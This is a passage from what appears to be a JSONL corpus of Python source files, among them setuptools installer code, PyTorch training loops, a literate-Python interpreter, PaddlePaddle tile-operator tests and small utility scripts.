.py extension and an .exe launcher\n \"\"\"\n if type_ == 'gui':\n launcher_type = 'gui'\n ext = '-script.pyw'\n old = ['.pyw']\n else:\n launcher_type = 'cli'\n ext = '-script.py'\n old = ['.py', '.pyc', '.pyo']\n hdr = cls._adjust_header(type_, header)\n blockers = [name + x for x in old]\n yield (name + ext, hdr + script_text, 't', blockers)\n yield (\n name + '.exe', get_win_launcher(launcher_type),\n 'b' # write in binary mode\n )\n if not is_64bit():\n # install a manifest for the launcher to prevent Windows\n # from detecting it as an installer (which it will for\n # launchers like easy_install.exe). Consider only\n # adding a manifest for launchers detected as installers.\n # See Distribute #143 for details.\n m_name = name + '.exe.manifest'\n yield (m_name, load_launcher_manifest(name), 't')\n\n\n# for backward-compatibility\nget_script_args = ScriptWriter.get_script_args\n\n\ndef get_win_launcher(type):\n \"\"\"\n Load the Windows launcher (executable) suitable for launching a script.\n\n `type` should be either 'cli' or 'gui'\n\n Returns the executable as a byte string.\n \"\"\"\n launcher_fn = '%s.exe' % type\n if platform.machine().lower() == 'arm':\n launcher_fn = launcher_fn.replace(\".\", \"-arm.\")\n if is_64bit():\n launcher_fn = launcher_fn.replace(\".\", \"-64.\")\n else:\n launcher_fn = launcher_fn.replace(\".\", \"-32.\")\n return resource_string('setuptools', launcher_fn)\n\n\ndef load_launcher_manifest(name):\n manifest = pkg_resources.resource_string(__name__, 'launcher manifest.xml')\n if PY2:\n return manifest % vars()\n else:\n return manifest.decode('utf-8') % vars()\n\n\ndef rmtree(path, ignore_errors=False, onerror=auto_chmod):\n \"\"\"Recursively delete a directory tree.\n\n This code is taken from the Python 2.4 version of 'shutil', because\n the 2.3 version doesn't really work right.\n \"\"\"\n if ignore_errors:\n def onerror(*args):\n pass\n elif onerror is None:\n def onerror(*args):\n raise\n names = []\n try:\n names = os.listdir(path)\n except os.error:\n onerror(os.listdir, path, sys.exc_info())\n for name in names:\n fullname = os.path.join(path, name)\n try:\n mode = os.lstat(fullname).st_mode\n except os.error:\n mode = 0\n if stat.S_ISDIR(mode):\n rmtree(fullname, ignore_errors, onerror)\n else:\n try:\n os.remove(fullname)\n except os.error:\n onerror(os.remove, fullname, sys.exc_info())\n try:\n os.rmdir(path)\n except os.error:\n onerror(os.rmdir, path, sys.exc_info())\n\n\ndef current_umask():\n tmp = os.umask(0o022)\n os.umask(tmp)\n return tmp\n\n\ndef bootstrap():\n # This function is called when setuptools*.egg is run using /bin/sh\n import setuptools\n\n argv0 = os.path.dirname(setuptools.__path__[0])\n sys.argv[0] = argv0\n sys.argv.append(argv0)\n main()\n\n\ndef main(argv=None, **kw):\n from setuptools import setup\n from setuptools.dist import Distribution\n\n class DistributionWithoutHelpCommands(Distribution):\n common_usage = \"\"\n\n def _show_help(self, *args, **kw):\n with _patch_usage():\n Distribution._show_help(self, *args, **kw)\n\n if argv is None:\n argv = sys.argv[1:]\n\n with _patch_usage():\n setup(\n script_args=['-q', 'easy_install', '-v'] + argv,\n script_name=sys.argv[0] or 'easy_install',\n distclass=DistributionWithoutHelpCommands, **kw\n )\n\n\n@contextlib.contextmanager\ndef _patch_usage():\n import distutils.core\n USAGE = textwrap.dedent(\"\"\"\n usage: %(script)s [options] requirement_or_url ...\n or: %(script)s --help\n \"\"\").lstrip()\n\n def gen_usage(script_name):\n return USAGE % dict(\n script=os.path.basename(script_name),\n )\n\n saved = distutils.core.gen_usage\n distutils.core.gen_usage = gen_usage\n try:\n yield\n finally:\n distutils.core.gen_usage = saved\n\n"} {"ext": "py", "sha": "1a2f56cf093b461b930e93a13c1778c2f4a7b13d", "content": "import matplotlib.pyplot as plt\nimport math, cv2, glob\nimport numpy as np\n\nclass ImageVisualizer:\n # region vars\n\n # endregion\n def __init__(self, shape):\n self.shape = shape\n\n # to get a name of parameter variable to print a name in subplot\n def param_to_str(self, obj, namespace):\n return [name for name in namespace if namespace[name] is obj]\n\n # tool to draw multiple images on plot\n def plot_images(self, images, descriptions = None, invert_colors=False):\n w = self.shape[0]\n h = self.shape[1]\n fig = plt.figure(figsize=(8, 8))\n total_images = len(images)\n rows = math.ceil(total_images/3)\n columns = math.ceil(total_images/rows)\n for i in range(1, total_images + 1):\n fig.add_subplot(rows, columns, i)\n if invert_colors and len(images[i-1].shape) > 2: \n plt.imshow(cv2.cvtColor(images[i-1], cv2.COLOR_BGR2RGB)) # need to invert colors\n else:\n plt.imshow(images[i-1]) # do not need to invert colors when showing binary images\n #plt.gca().set_title(self.param_to_str(images[i-1], globals()))\n if not descriptions is None:\n plt.gca().set_title(descriptions[i-1])\n mng = plt.get_current_fig_manager() # to maximize window\n mng.window.state('zoomed')\n plt.show()\n \n def get_image_info(self, image, alias ):\n print(f'Image {alias} shape is: {image.shape}')\n \n # tests solid green area on blank image\n def draw_solid_area_on_blank_image(self, array_of_points):\n blank_image = np.zeros(self.shape, dtype=np.uint8) \n cv2.fillPoly(blank_image, pts = [array_of_points],color = (255,255,0))\n return blank_image\n \n def overlay_image_with_solid_area(self, main_image, image2): \n return cv2.addWeighted(main_image, 0.8, image2, 0.2, 0)\n\n"} {"ext": "py", "sha": "1a2f570b022acc9b4789b5e3b9b14ecd5de70a22", "content": "# coding=utf-8\n\n# 异常处理\n\ntry:\n file = open(\"hejeffery.txt\", \"r\")\n\nexcept IOError:\n print \"没有找到文件\"\n\nelse:\n print \"找到文件了\"\n\n\ntry:\n file = open(\"hejeffery.txt\", \"r\")\n\nexcept IOError:\n print \"没有找到文件\"\n\nfinally:\n print \"始终都会执行这句话\""} {"ext": "py", "sha": "1a2f5942ee004989816d672fa57d7dab25fe65a7", "content": "import torch\nfrom tqdm import tqdm\nfrom utils import Logger, AverageMeter, accuracy\n\nimport numpy as np\n\n\ndef train(trainloader, model, criterion, optimizer):\n # switch to train mode\n model.train()\n\n losses = AverageMeter()\n top1 = AverageMeter()\n top3 = AverageMeter()\n top5 = AverageMeter()\n\n criterion.reset()\n\n bar = tqdm(enumerate(trainloader), total=len(trainloader))\n for batch_idx, (inputs, targets) in bar:\n \n inputs, targets = inputs.cuda(), targets.cuda()\n\n # compute output\n outputs = model(inputs)\n\n loss_dict = criterion(outputs, targets)\n\n loss = loss_dict[0][\"loss\"]\n\n # measure accuracy and record loss\n prec1, prec3, prec5 = accuracy(outputs.data, targets.data, topk=(1, 3, 5))\n losses.update(loss.item(), inputs.size(0))\n\n top1.update(prec1.item(), inputs.size(0))\n top3.update(prec3.item(), inputs.size(0))\n top5.update(prec5.item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # plot progress\n bar.set_postfix_str('({batch}/{size}) Loss: {loss:.8f} | top1: {top1: .4f} | top3: {top3: .4f} | top5: {top5: .4f}'.format(\n batch=batch_idx + 1,\n size=len(trainloader),\n loss=losses.avg,\n top1=top1.avg,\n top3=top3.avg,\n top5=top5.avg,\n ))\n\n return (losses.avg, top1.avg, top3.avg, top5.avg)\n\n@torch.no_grad()\ndef test(testloader, model, criterion, ece_criterion, sce_criterion, T=1.0):\n\n criterion.reset()\n ece_criterion.reset()\n sce_criterion.reset()\n\n losses = AverageMeter()\n top1 = AverageMeter()\n top3 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n bar = tqdm(enumerate(testloader), total=len(testloader))\n for batch_idx, (inputs, targets) in bar:\n\n inputs, targets = inputs.cuda(), targets.cuda()\n\n # compute output\n outputs = model(inputs)\n outputs /= T\n\n loss_dict = criterion(outputs, targets)\n\n loss = loss_dict[0][\"loss\"]\n\n ece_criterion.forward(outputs,targets)\n sce_criterion.forward(outputs,targets)\n \n prec1, prec3, prec5 = accuracy(outputs.data, targets.data, topk=(1, 3, 5))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec1.item(), inputs.size(0))\n top3.update(prec3.item(), inputs.size(0))\n top5.update(prec5.item(), inputs.size(0))\n\n\n # plot progress\n bar.set_postfix_str('({batch}/{size}) Loss: {loss:.8f} | top1: {top1: .4f} | top3: {top3: .4f} | top5: {top5: .4f}'.format(\n batch=batch_idx + 1,\n size=len(testloader),\n loss=losses.avg,\n top1=top1.avg,\n top3=top3.avg,\n top5=top5.avg,\n ))\n\n eces = ece_criterion.get_overall_ECELoss()\n cces = sce_criterion.get_overall_CCELoss()\n\n return (losses.avg, top1.avg, top3.avg, top5.avg, cces.item(), eces.item())\n\n@torch.no_grad()\ndef get_logits_targets(testloader, model):\n\n # switch to evaluate mode\n model.eval()\n\n all_targets = None\n all_outputs = None\n\n bar = tqdm(testloader, total=len(testloader))\n for inputs, targets in bar:\n inputs = inputs.cuda()\n # compute output\n outputs = model(inputs)\n # to numpy\n targets = targets.cpu().numpy()\n outputs = outputs.cpu().numpy()\n\n if all_targets is None:\n all_outputs = outputs\n all_targets = targets\n else:\n all_targets = np.concatenate([all_targets, targets], axis=0)\n all_outputs = np.concatenate([all_outputs, outputs], axis=0)\n\n return all_outputs, all_targets\n\n@torch.no_grad()\ndef get_logits_targets_torch(testloader, model):\n\n # switch to evaluate mode\n model.eval()\n\n all_targets = None\n all_outputs = None\n\n bar = tqdm(testloader, total=len(testloader))\n for inputs, targets in bar:\n inputs = inputs.cuda()\n targets= targets.cuda()\n # compute output\n outputs = model(inputs)\n\n if all_targets is None:\n all_outputs = outputs\n all_targets = targets\n else:\n all_targets = torch.cat([all_targets, targets], dim=0)\n all_outputs = torch.cat([all_outputs, outputs], dim=0)\n\n return all_outputs, all_targets\n\n\ndef fine_tune(trainloader, model, criterion, optimizer):\n # switch to train mode\n model.train()\n\n losses = AverageMeter()\n top1 = AverageMeter()\n top3 = AverageMeter()\n top5 = AverageMeter()\n\n criterion.reset()\n \n for batch_idx, (inputs, targets) in enumerate(trainloader):\n \n inputs, targets = inputs.cuda(), targets.cuda()\n # compute output\n outputs = model(inputs)\n \n loss_dict = criterion(outputs, targets)\n loss = loss_dict[0][\"loss\"]\n\n # measure accuracy and record loss\n losses.update(loss.item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n return losses.avg"} {"ext": "py", "sha": "1a2f596b243c27f687f209e4729403099f81c8f4", "content": "from typing import Optional\n\nfrom server.crud.base import CRUDBase\nfrom server.db.models import RolesTable\nfrom server.schemas.role import RoleCreate, RoleUpdate\n\n\nclass CRUDRole(CRUDBase[RolesTable, RoleCreate, RoleUpdate]):\n def get_by_name(self, *, name: str) -> Optional[RolesTable]:\n return RolesTable.query.filter(RolesTable.name == name).first()\n\n\nrole_crud = CRUDRole(RolesTable)\n"} {"ext": "py", "sha": "1a2f5a912c80f5b551c5ebad298ebd156262d6dd", "content": "# Copyright 2014, Solly Ross (see LICENSE.txt)\n# Portions Copyright Python Software Foundation\n# (see COPYRIGHT.txt and PYTHON-LICENSE.txt)\n\n# main part\nimport code\nimport contextlib\nimport doctest\nimport getpass\nimport linecache\nimport pdb\nimport re\nimport sys\nimport traceback\nimport warnings\n\nimport six\n\nfrom yalpt import ansi_helper as ansi\nfrom yalpt import formatters\nfrom yalpt import parsers\n\n\n__all__ = [\"LiterateInterpreter\"]\n\n\n@contextlib.contextmanager\ndef noop_mgr(writer):\n yield writer\n\n\nclass LiterateInterpreter(code.InteractiveConsole):\n def __init__(self, text_formatter=formatters.NoopFormatter(),\n code_parser=parsers.DocTestParser(), use_ansi=True,\n use_readline=True, env_driver=None, *args, **kwargs):\n code.InteractiveConsole.__init__(self, *args, **kwargs)\n\n self._output_checker = doctest.OutputChecker()\n self._fakeout = doctest._SpoofOut()\n self.chunks = None\n self.exc_msg = None\n self.name = 'literate program'\n self.text_formatter = text_formatter\n self.code_parser = code_parser\n self.use_ansi = use_ansi\n self.pause = True\n self.interactive = True\n\n if use_readline:\n self._readline = __import__('readline')\n self._add_readline()\n else:\n self._readline = None\n\n self._env_driver = env_driver\n\n self._correct_path()\n\n def runfunction(self, func):\n self.runcode(six.get_function_code(func))\n\n def _correct_path(self):\n def correct_path():\n import sys\n if '' not in sys.path:\n sys.path.insert(0, '')\n del sys\n\n self.runfunction(correct_path)\n\n def _add_readline(self):\n self.locals['__console_locals__'] = self.locals\n self.locals['readline'] = self._readline\n\n def add_readline():\n # add support for completion\n import atexit\n import os\n import readline\n import rlcompleter\n\n completer = rlcompleter.Completer(__console_locals__) # noqa\n readline.set_completer(completer.complete)\n\n # tab completion\n readline.parse_and_bind('Control-space: complete')\n # history file\n histfile = os.path.join(os.environ['HOME'],\n '.literate-python-history')\n try:\n readline.read_history_file(histfile)\n except IOError:\n pass\n atexit.register(readline.write_history_file, histfile)\n del os, histfile, readline, rlcompleter\n\n self.runfunction(add_readline)\n\n del self.locals['__console_locals__']\n del self.locals['readline']\n\n def _interact_once(self, more):\n try:\n if more:\n prompt = sys.ps2\n else:\n prompt = sys.ps1\n try:\n line = self.raw_input(prompt)\n # Can be None if sys.stdin was redefined\n encoding = getattr(sys.stdin, \"encoding\", None)\n if encoding and not isinstance(line, six.text_type):\n line = line.decode(encoding)\n except EOFError:\n self.write(\"\\n\")\n return (False, None)\n else:\n if len(line) == 0:\n blank = True\n else:\n blank = False\n more = self.push(line)\n except KeyboardInterrupt:\n self.write(\"\\nKeyboardInterrupt\\n\")\n self.resetbuffer()\n more = False\n blank = False\n\n return (blank, more)\n\n # BEGIN FROM PYTHON STD LIB\n # (extracted from the doctest module, made slight changes to the\n # filename RE, and refactored _capture_output into its own method)\n __LINECACHE_FILENAME_RE = re.compile(r'.+)'\n r'\\[(?P\\d+)\\]>$')\n\n def _patched_linecache_getlines(self, filename, module_globals=None):\n m = self.__LINECACHE_FILENAME_RE.match(filename)\n if m and m.group('name') == self.name:\n chunk = self.chunks[int(m.group('chunknum'))]\n source = chunk.source\n if isinstance(source, six.text_type):\n source = source.encode('ascii', 'backslashreplace')\n return source.splitlines(True)\n else:\n return self.save_linecache_getlines(filename, module_globals)\n\n @contextlib.contextmanager\n def _capture_output(self):\n save_stdout = sys.stdout\n sys.stdout = self._fakeout\n\n # set up pdb to work properly\n save_set_trace = pdb.set_trace\n self.debugger = doctest._OutputRedirectingPdb(save_stdout)\n self.debugger.reset()\n pdb.set_trace = self.debugger.set_trace\n self.save_linecache_getlines = linecache.getlines\n linecache.getlines = self._patched_linecache_getlines\n save_displayhook = sys.displayhook\n sys.displayhook = sys.__displayhook__\n\n try:\n yield sys.stdout\n finally:\n sys.stdout = save_stdout\n pdb.set_trace = save_set_trace\n linecache.getlines = self.save_linecache_getlines\n sys.displayhook = save_displayhook\n # END FROM PYTHON STD LIB\n\n def _process_code_line(self, line, res, more):\n if self._readline is not None:\n self._readline.add_history(line)\n\n if more:\n self.write(sys.ps2)\n else:\n self.write(sys.ps1)\n\n if self.use_ansi:\n self.write(ansi.with_codes(line, 38, 5, 0xdf))\n else:\n self.write(line)\n\n self.write(\"\\n\")\n with self._capture_output() as output:\n more = self.push(line)\n\n res += output.getvalue()\n output.truncate(0)\n\n exc = self.exc_msg\n self.exc_msg = None\n return (res, exc, more)\n\n def _format_tb(self):\n try:\n extype, value, tb = sys.exc_info()\n sys.last_type = extype\n sys.last_value = value\n sys.last_traceback = tb\n res = traceback.format_exception_only(extype, value)\n finally:\n tb = None\n\n if res:\n return res[-1]\n\n def showtraceback(self):\n try:\n extype, value, tb = sys.exc_info()\n sys.last_type = extype\n sys.last_value = value\n sys.last_traceback = tb\n tblist = traceback.extract_tb(tb)\n del tblist[:1]\n lst = traceback.format_list(tblist)\n if lst:\n lst.insert(0, \"Traceback (most recent call last):\\n\")\n exc_msg = traceback.format_exception_only(extype, value)\n lst[len(lst):] = exc_msg\n finally:\n tblist = tb = None\n\n if self.filename.startswith(\"\".format(name=self.name,\n num=chunk_ind)\n more = False\n res = \"\"\n lines = chunk.source.split(\"\\n\")\n for line in lines[:-1]:\n res, exc, more = self._process_code_line(line, res, more)\n\n if more:\n res, exc, more = self._process_code_line(lines[-1], res, more)\n\n if self.use_ansi:\n mgr = ansi.BoxMaker(self)\n else:\n mgr = noop_mgr(self)\n\n if chunk.want is not None or chunk.exc_msg is not None:\n if len(res) > 0 or exc is not None:\n # compare to the expected output\n # TODO(sross): convert options to optionsflags\n optionsflags = 0\n\n checker = self._output_checker\n if exc is None:\n same = self._output_checker.check_output(chunk.want,\n res, 0)\n if not same:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, output different from '\n 'expected:\\n')\n maker.write('================================'\n '========\\n\\n')\n diff = checker.output_difference(chunk, res,\n optionsflags)\n maker.write(diff)\n self.write('\\n')\n else:\n self.write(res)\n elif chunk.exc_msg is None:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, unexpected exception:\\n')\n maker.write('==============================\\n\\n')\n maker.write(exc)\n self.write('\\n')\n else:\n same_ex = checker.check_output(chunk.exc_msg,\n exc, optionsflags)\n if not same_ex:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, exception different from '\n 'expected:\\n')\n maker.write('=================================='\n '=========\\n\\n')\n diff = checker.output_difference(chunk, res,\n optionsflags)\n maker.write(diff)\n self.write('\\n')\n else:\n self.write(res)\n else:\n if exc is not None:\n self.write('\\n')\n with mgr as maker:\n maker.write('Warning, unexpected exception:\\n')\n maker.write('==============================\\n\\n')\n maker.write(exc)\n self.write('\\n')\n else:\n self.write(res)\n\n if not self.pause:\n self.write(sys.ps1 + '\\n')\n\n def no_echo_input(self, prompt):\n with warnings.catch_warnings():\n res = getpass.getpass(prompt)\n return res\n\n def interact(self, lit_string, name, pause=True, interactive=True):\n self.name = name\n self.pause = pause\n self.interactive = interactive\n\n try:\n sys.ps1\n except AttributeError:\n sys.ps1 = \">>> \"\n\n try:\n sys.ps2\n except AttributeError:\n sys.ps2 = \"... \"\n\n try:\n sys.ps3\n except AttributeError:\n sys.ps3 = '>>> '\n\n if self._env_driver is not None:\n extra_locals = self._env_driver.setup()\n self.locals.update(extra_locals)\n extra_banner = self._env_driver.banner\n driver_text = \" ({0})\".format(self._env_driver.DRIVER_NAME)\n else:\n extra_banner = \"\"\n driver_text = \"\"\n\n cprt = ('Type \"help\", \"copyright\", \"credits\" or \"license\" for '\n 'more information about Python.')\n self.write(\"Literate Python Shell{driver_text}\\nPython {ver} \"\n \"on {platform}\\n{cprt}\\n\"\n \"{extra_banner}\\n\\n\".format(driver_text=driver_text,\n ver=sys.version,\n platform=sys.platform,\n cprt=cprt,\n extra_banner=extra_banner))\n\n if not interactive and pause:\n self.write('Press enter to continue after a code block\\n\\n')\n\n try:\n parser = self.code_parser\n start = True\n self.chunks = list(parser.parse(lit_string, name))\n for chunk_ind, chunk in enumerate(self.chunks):\n if isinstance(chunk, parsers.CodeChunk):\n self._run_code(chunk, chunk_ind)\n elif not chunk:\n continue\n else:\n if not start and pause and interactive:\n self.filename = \"\"\n more = False\n blanks = 0\n while blanks < 2:\n blank, more = self._interact_once(more)\n\n if blank:\n blanks += 1\n else:\n blanks = 0\n\n if more is None:\n return\n\n # reset exc_msg so it doesn't get\n # raised after the next code block\n self.exc_msg = None\n elif not start and pause:\n self.no_echo_input(sys.ps3)\n\n self.write(self.text_formatter.format(chunk))\n\n start = False\n\n complete_msg = (\"\\n{file} complete! Continuing to interactive \"\n \"console...\\n\\n\".format(file=self.name))\n\n if self.use_ansi:\n self.write(ansi.with_codes(complete_msg, 1))\n else:\n self.write(complete_msg)\n\n self.filename = \"\"\n self.locals['con'] = self\n more = False\n while more is not None:\n blank, more = self._interact_once(more)\n finally:\n if self._env_driver is not None:\n self._env_driver.teardown()\n"} {"ext": "py", "sha": "1a2f5ae8d3c02f130f839a951dcfb420bc66083b", "content": "# print absolute value of an integer\n# python的语法比较简单,采用缩进方式\na = 100\nif a>=0 :\n print(a)\nelse :\n print(-a)\n"} {"ext": "py", "sha": "1a2f5baed8b7607321747e371d736b51f44b1f86", "content": "\"\"\"\ndatauri, library for \"data:\" URIs as defined in RFC 2397.\n\"\"\"\n\nfrom .datauri import ( # noqa: F401\n DataURIError,\n discover,\n parse)\n"} {"ext": "py", "sha": "1a2f5dbd40eb6ca1bdd7c250d3497c57722d9386", "content": "# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport sys\n\nsys.path.append(\"..\")\nimport unittest\nimport numpy as np\nfrom op_test import OpTest\nimport paddle\nimport paddle.fluid as fluid\nfrom paddle.fluid import compiler, Program, program_guard\n\n\n#Situation 1: repeat_times is a list (without tensor)\nclass TestTileOpRank1(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.init_data()\n self.inputs = {'X': np.random.random(self.ori_shape).astype(\"float32\")}\n self.attrs = {'repeat_times': self.repeat_times}\n output = np.tile(self.inputs['X'], self.repeat_times)\n self.outputs = {'Out': output}\n\n def init_data(self):\n self.ori_shape = [100]\n self.repeat_times = [2]\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad(['X'], 'Out')\n\n\n# with dimension expanding\nclass TestTileOpRank2Expanding(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = [120]\n self.repeat_times = [2, 2]\n\n\nclass TestTileOpRank2(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [2, 3]\n\n\nclass TestTileOpRank3_Corner(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 10, 5)\n self.repeat_times = (1, 1, 1)\n\n\nclass TestTileOpRank3_Corner2(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 10, 5)\n self.repeat_times = (2, 2)\n\n\nclass TestTileOpRank3(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 4, 15)\n self.repeat_times = (2, 1, 4)\n\n\nclass TestTileOpRank4(TestTileOpRank1):\n\n def init_data(self):\n self.ori_shape = (2, 4, 5, 7)\n self.repeat_times = (3, 2, 1, 2)\n\n\n# Situation 2: repeat_times is a list (with tensor)\nclass TestTileOpRank1_tensor_attr(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.init_data()\n repeat_times_tensor = []\n for index, ele in enumerate(self.repeat_times):\n repeat_times_tensor.append((\"x\" + str(index), np.ones(\n (1)).astype('int32') * ele))\n\n self.inputs = {\n 'X': np.random.random(self.ori_shape).astype(\"float32\"),\n 'repeat_times_tensor': repeat_times_tensor,\n }\n self.attrs = {\"repeat_times\": self.infer_repeat_times}\n output = np.tile(self.inputs['X'], self.repeat_times)\n self.outputs = {'Out': output}\n\n def init_data(self):\n self.ori_shape = [100]\n self.repeat_times = [2]\n self.infer_repeat_times = [-1]\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad(['X'], 'Out')\n\n\nclass TestTileOpRank2_Corner_tensor_attr(TestTileOpRank1_tensor_attr):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [1, 1]\n self.infer_repeat_times = [1, -1]\n\n\nclass TestTileOpRank2_attr_tensor(TestTileOpRank1_tensor_attr):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [2, 3]\n self.infer_repeat_times = [-1, 3]\n\n\n# Situation 3: repeat_times is a tensor\nclass TestTileOpRank1_tensor(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.init_data()\n self.inputs = {\n 'X': np.random.random(self.ori_shape).astype(\"float32\"),\n 'RepeatTimes': np.array(self.repeat_times).astype(\"int32\"),\n }\n self.attrs = {}\n output = np.tile(self.inputs['X'], self.repeat_times)\n self.outputs = {'Out': output}\n\n def init_data(self):\n self.ori_shape = [100]\n self.repeat_times = [2]\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad(['X'], 'Out')\n\n\nclass TestTileOpRank2_tensor(TestTileOpRank1_tensor):\n\n def init_data(self):\n self.ori_shape = [12, 14]\n self.repeat_times = [2, 3]\n\n\n# Situation 4: input x is Integer\nclass TestTileOpInteger(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.inputs = {\n 'X': np.random.randint(10, size=(4, 4, 5)).astype(\"int32\")\n }\n self.attrs = {'repeat_times': [2, 1, 4]}\n output = np.tile(self.inputs['X'], (2, 1, 4))\n self.outputs = {'Out': output}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\n# Situation 5: input x is Bool\nclass TestTileOpBoolean(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.inputs = {'X': np.random.randint(2, size=(2, 4, 5)).astype(\"bool\")}\n self.attrs = {'repeat_times': [2, 1, 4]}\n output = np.tile(self.inputs['X'], (2, 1, 4))\n self.outputs = {'Out': output}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\n# Situation 56: input x is Integer\nclass TestTileOpInt64_t(OpTest):\n\n def setUp(self):\n self.op_type = \"tile\"\n self.place = paddle.device.MLUPlace(0)\n self.__class__.use_mlu = True\n self.inputs = {\n 'X': np.random.randint(10, size=(2, 4, 5)).astype(\"int64\")\n }\n self.attrs = {'repeat_times': [2, 1, 4]}\n output = np.tile(self.inputs['X'], (2, 1, 4))\n self.outputs = {'Out': output}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestTileError(unittest.TestCase):\n\n def test_errors(self):\n with program_guard(Program(), Program()):\n x1 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],\n fluid.CPUPlace())\n repeat_times = [2, 2]\n self.assertRaises(TypeError, paddle.tile, x1, repeat_times)\n x2 = fluid.layers.data(name='x2', shape=[4], dtype=\"uint8\")\n self.assertRaises(TypeError, paddle.tile, x2, repeat_times)\n x3 = fluid.layers.data(name='x3', shape=[4], dtype=\"bool\")\n x3.stop_gradient = False\n self.assertRaises(ValueError, paddle.tile, x3, repeat_times)\n\n\nclass TestTileAPIStatic(unittest.TestCase):\n\n def test_api(self):\n with program_guard(Program(), Program()):\n repeat_times = [2, 2]\n x1 = fluid.layers.data(name='x1', shape=[4], dtype=\"int32\")\n out = paddle.tile(x1, repeat_times)\n positive_2 = fluid.layers.fill_constant([1], dtype=\"int32\", value=2)\n out2 = paddle.tile(x1, repeat_times=[positive_2, 2])\n\n\n# Test python API\nclass TestTileAPI(unittest.TestCase):\n\n def test_api(self):\n with fluid.dygraph.guard():\n np_x = np.random.random([12, 14]).astype(\"float32\")\n x = paddle.to_tensor(np_x)\n\n positive_2 = np.array([2]).astype(\"int32\")\n positive_2 = paddle.to_tensor(positive_2)\n\n repeat_times = np.array([2, 3]).astype(\"int32\")\n repeat_times = paddle.to_tensor(repeat_times)\n\n out_1 = paddle.tile(x, repeat_times=[2, 3])\n out_2 = paddle.tile(x, repeat_times=[positive_2, 3])\n out_3 = paddle.tile(x, repeat_times=repeat_times)\n\n assert np.array_equal(out_1.numpy(), np.tile(np_x, (2, 3)))\n assert np.array_equal(out_2.numpy(), np.tile(np_x, (2, 3)))\n assert np.array_equal(out_3.numpy(), np.tile(np_x, (2, 3)))\n\n\nif __name__ == \"__main__\":\n paddle.enable_static()\n unittest.main()\n"} {"ext": "py", "sha": "1a2f5e8bab97eb229d96cd075b7cc632d8e8b611", "content": "# Copyright 2016-2019 Dirk Thomas\n# Licensed under the Apache License, Version 2.0\n\nfrom pathlib import Path\n\nimport pytest\nfrom scspell import Report\nfrom scspell import SCSPELL_BUILTIN_DICT\nfrom scspell import spell_check\n\n\nspell_check_words_path = Path(__file__).parent / 'spell_check.words'\n\n\n@pytest.fixture(scope='module')\ndef known_words():\n global spell_check_words_path\n return spell_check_words_path.read_text().splitlines()\n\n\ndef test_spell_check(known_words):\n source_filenames = [Path(__file__).parents[1] / 'setup.py'] + \\\n list(\n (Path(__file__).parents[1] / 'colcon_metadata')\n .glob('**/*.py')) + \\\n list((Path(__file__).parents[1] / 'test').glob('**/*.py'))\n\n for source_filename in sorted(source_filenames):\n print('Spell checking:', source_filename)\n\n # check all files\n report = Report(known_words)\n spell_check(\n [str(p) for p in source_filenames], base_dicts=[SCSPELL_BUILTIN_DICT],\n report_only=report, additional_extensions=[('', 'Python')])\n\n unknown_word_count = len(report.unknown_words)\n assert unknown_word_count == 0, \\\n 'Found {unknown_word_count} unknown words: '.format_map(locals()) + \\\n ', '.join(sorted(report.unknown_words))\n\n unused_known_words = set(known_words) - report.found_known_words\n unused_known_word_count = len(unused_known_words)\n assert unused_known_word_count == 0, \\\n '{unused_known_word_count} words in the word list are not used: ' \\\n .format_map(locals()) + ', '.join(sorted(unused_known_words))\n\n\ndef test_spell_check_word_list_order(known_words):\n assert known_words == sorted(known_words), \\\n 'The word list should be ordered alphabetically'\n\n\ndef test_spell_check_word_list_duplicates(known_words):\n assert len(known_words) == len(set(known_words)), \\\n 'The word list should not contain duplicates'\n"} {"ext": "py", "sha": "1a2f5f20c7a5fba766f0599d46bbdc5f002967b3", "content": "#!/usr/bin/env python\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", 